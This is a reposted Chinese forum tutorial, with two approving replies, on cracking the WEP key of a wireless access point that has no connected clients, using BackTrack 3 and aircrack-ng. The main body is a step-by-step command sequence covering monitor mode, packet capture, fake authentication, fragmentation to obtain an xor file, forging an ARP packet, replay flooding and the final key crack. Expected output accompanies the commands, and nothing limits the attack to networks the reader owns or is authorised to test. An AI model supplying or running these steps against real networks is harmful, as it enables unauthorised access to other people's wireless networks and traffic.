【转帖】BT3下破解无客户端wep简明教程（图文版）

gl***

首先
https://wiki.remote-exploit.org/backtrack/wiki/Laptops
到这个地方确认你的笔记本电脑可以做这个事情。
基本新一点的都是兼容的。

其次，到这里确认你的无线网卡兼容
https://wiki.remote-exploit.org/backtrack/wiki/Wireless%20Cards

然后开始下载你需要的BT3版本：
http://remote-exploit.org/backtrack_download.html

个人建议：
如果随便玩玩，或者是台式机，可以下载CD版的那个，因为启动一次时间不短。
如果是笔记本，硬盘又大，可以下载 USB版的那个。
USB版：
ftp://bt3.aircrack-ng.org/bt3b141207.rar

以下文章《BT3下破解无客户端wep简明教程（图文版）》
转自：http://www.axisgroup.com.cn/blog/article.asp?id=7

gl***

BT3下破解无客户端wep简明教程（图文版）

1. 接上篇教程,下载半 安装(或刻盘)BT3后，在BT3下直接破解无客户端。现教程奉上.
2．启动BT3,打开一个窗口，输入ifconfig –a 查看网卡  （顺便记下自己网卡的mac，后面要用到）

   我的网卡是rausb0
   再输入ifconfig –a rausb0加载usb网卡驱动


3.输入airmon-ng
start rausb0
6
激活网卡的Monitor模式


后面的6 是你要破解ap 的工作频道
根据实际，换成你破解的ap的实际工作频道（下同）

4.输入抓包命令，抓包并查看你要破解的ap的essid
mac

   输入命令
airodump-ng --ivs -w name -c 6 rausb0
，其中，rausb0是你破解用的网卡接口名（下同），这样，你的窗口将显示一个工作站，可以看到你要破解的ap的essid 和mac ，并记下ap的essid 和mac。


5.上面窗口不关闭，另开一个窗口，输入命令，用自己的网卡连接要破解的ap

       输入
aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac rausb0

       这时，系统将回显

Sending Authentication Request


Authentication successful



Sending Association Request
Association successful :-)


6．输入aireplay-ng
-5 -b ap的mac -h 自己网卡的mac rausb0
来获得xor文件

如果一切顺利，系统将回显
Use this packet ?

输入y
回车，将得到一个至关重要的xor文件。

再输入ls
查看当前目录，你将看到刚才生成的一个后缀名为xor 的文件。

7．输入packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment -××××-××××.xor -w mrarp
其中，–l中的l是L的小写，别和1混淆，而其中的××××-××××.xor 是你刚才生成的文件名。

系统回显：Wrote packet to: mrarp

8．输入aireplay-ng -2 –r mrarp
-x 1024 rausb0 ，发包攻击.其中，-x 1024 是限定发包速度，避免网卡死机，我选择的是1024。


输入y
回车
攻击开始

这时，前面的抓包窗口上的data将迅速增加。

到数据增加到3万以上时，另开窗口，启动

aircrack-ng -n 64 -b ap的mac name-01.ivs

其中
64 是64位密码，如果是128位，换成128即可。



完成, 以上~~ 即 WEP密码~~ :)

gu***

好啊，已经用BT3 好几个月了，破解很方便很快的

imne***

感谢分享！！